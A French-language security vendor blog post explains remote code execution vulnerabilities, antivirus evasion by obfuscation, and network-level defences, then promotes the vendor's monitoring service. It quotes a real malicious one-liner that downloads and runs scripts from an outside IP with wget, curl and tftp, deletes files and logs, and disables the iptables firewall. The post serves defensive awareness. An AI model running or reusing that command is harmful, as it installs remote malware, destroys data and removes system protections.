Blog > Blogue

Exploitation des vulnérabilités RCE (Execution de Codes à distance): le cauchemar des antivirus, EDR et SIEM.

Plusieurs vulnérabilités de sécurité de type RCE (exécution de code à distance / Remote Code Execution) sont régulièrement signalées sur le marché (ex CVE-2023-27997 - Fortigate SSL VPN, CVE-2021-31207 Proxyshell, CVE-2021-34527 PrintNightmare, etc.) .

Elles sont très souvent signalées comme étant critiques et font presque toutes la Une des médias. Certaines sont très fortement médiatisées telles que ProxyShell, PrintNightmare, EternalBlue, etc.

Qu’est ce qui fait que ce type d’attaques sont plus dangereuses que les autres? Comment se protéger contre ces attaques?

Qu’est ce qu’une vulnérabilité RCE

L’exécution de code à distance (RCE) est un type d’attaque au cours duquel le pirate lance des commandes à distance contre une cible donnée. Les commandes lancées par le pirate sont exécutées par la machine attaquée, comme si le pirate y était connecté. Ceci se fait en exploitant une vulnérabilité existence sur la cible.

Généralement la vulnérabilité exploitée est de type zero-day (inconnue), ce qui augmente fortement le nombre de victimes potentielles. A titre d’exemple, en 2017 l’exploitation de la vulnérabilité MS17-010 EternalBlue pour distribuer le rançongiciel Wannacry a permis d’infecter plus de 200 000 ordinateurs en 3 jours. Croyez le ou non, nous trouvons encore cette vulnérabilité critique MS17-010 EternalBlue dans les réseaux en 2023!

Conséquences de l’exploitation d’une vulnérabilité RCE

Les conséquences de l’exploitation d’une vulnérabilité RCE sont diverses et variées. Voici quelques exemples:

  • Introduire un rançongiciel sur la cible attaquée. Le rançongiciel peut ensuite se propager dans le réseau
  • Accéder à des données confidentielles
  • Modifier de façon malveillante des données nécessaires à des traitements (ce qui peut avoir de graves conséquences dépendant des domaines)
  • Exfiltrer des données sur la cible
  • Donner un accès à distance permanent au pirate, avec des droits administrateurs
  • Arrêter la cible ou créer des dysfonctionnements.

Les codes d'exploitation des vulnérabilités RCE donnent le tourni aux antivirus, EDR et SIEM

Dans certains cas d’attaques que nous avons observé sur le terrain, le code d'exploitation de la vulnérabilités RCE est en mesure d’arrêter l’antivirus ou le EDR à distance, avant d'exécuter sa charge utile (shellcode).

Vu leur capacité à arrêter à distance les outils de sécurité sur vos machines, vous devez considérer que vous n’êtes pas pleinement protégés contre l’exploitation des vulnérabilités RCE avec un antivirus ou un EDR. Les SIEM ne sont pas non plus adaptés pour détecter les attaques RCE.

Utilisation de techniques d’obfuscation pour bypasser les outils de sécurité

Pour rendre les codes d'exploitation des vulnérabilités RCE difficilement détectables par les outils de sécurité, les pirates vont très souvent utiliser des techniques d’obfuscation (ex: Base64) pour cacher la vraie nature du code malicieux. Les outils de sécurité qui sont incapables d'interpréter du code obfusqué n’y verront que du feu.

Exemple de code malicieux en texte clair (cas réel).

AA..AAAA cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.163.47.189/xb.sh; curl -O http://185.163.47.189/xb.sh; chmod 777 xb.sh; sh xb.sh; tftp 185.163.47.189 -c get xb.sh; chmod 777 xb.sh; sh xb.sh; tftp -r xb2.sh -g 185.163.47.189; chmod 777 xb2.sh; sh xb2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.163.47.189 xb1.sh xb1.sh; sh xb1.sh; rm -rf xb.sh xb.sh xb2.sh xb1.sh; rm -rf *; rm -rf /var/log/wtmp; rm -rf ~/.bash_history; rm -rf /bin/netstat; history -w; service iptables stop; /sbin/iptables -F;/sbin/iptables -X; ulimit -n 999999;ulimit -u 999999; history -c; history -w .

Lorsque le code malicieux s'exécute, il télécharge un autre script malicieux appelé xb.sh sur une machine malicieuse distante (http://185.163.47[.]189). Le code malicieux donne ensuite tous les droits au script xb.sh (chmod 777 xb.sh), exécute le script, arrête le firewall sur le serveur ciblé (service iptables stop), etc. Après s’être exécuté, le code malicieux se supprime lui-même (rm -rf xb.sh), ce qui efface les traces de sa présence. Et tout ceci, sans avoir besoin de s’authentifier sur le serveur victime. Impressionnant!

Un tel code malicieux peut se détecter en analysant son contenu (ex: arrêt du firewall, etc.)

Le même code malicieux sous forme obfusquée (en base64) pour le rendre indétectable.

Obfuscated

La version obfusquée du code devient très difficile à détecter.

Les outils et mesures qui ne protègent pas contre l’exploitation des vulnérabilités RCE

Les mesures suivantes ne vous protègent pas contre l’exploitation des vulnérabilités RCE:

Les outils et mesures qui protègent contre l’exploitation des vulnérabilités RCE

Les outils qui protègent contre les attaques RCE sont au niveau du périmètre réseau, à l'exclusion des SIEM dont les capacités de détection d’intrusions sont très basiques.

Les outils appropriées sont:

  • Les systèmes de détection et prévention d’intrusions (IDS/IPS/NDR) tel que le CDS de Streamscan.
  • Les coupe-feu applicatifs (WAF).

En plus de ces outils, une bonne hygiène de cybersécurité permet de réduire les risques. Voici les recommandations à appliquer:

  • La gestion des vulnérabilités de sécurité : corriger rapidement les vulnérabilités RCE dès qu’elles sont signalées.
  • La réduction de la surface d’attaque : limiter l’exposition de vos serveurs au strict minimum nécessaire. Ne pas exposer un serveur sur Internet si cela n’est pas nécessaire.
  • L’endurcissement des serveurs pour renforcer leur sécurité.
  • La surveillance 24/7 de la sécurité de votre réseau

Comment Streamscan peut vous aider?

Les cyberattaques explosent sans cesse. Sans surveillance de sécurité en continu, vous êtes complètement aveugle sur les attaques qui vous ciblent. Or vous ne pouvez pas vous défendre contre ce que vous ne voyez pas.

Laissez-nous mettre nos yeux sur votre réseau. Adhérez à notre plateforme de surveillance gérée MDR propulsée par notre technologie de détection de cybermenaces CDS et mettez vous à l'abri des cyberattaques.

Contactez nous au +1 877 208-9040 ou parlez à l’un de nos experts.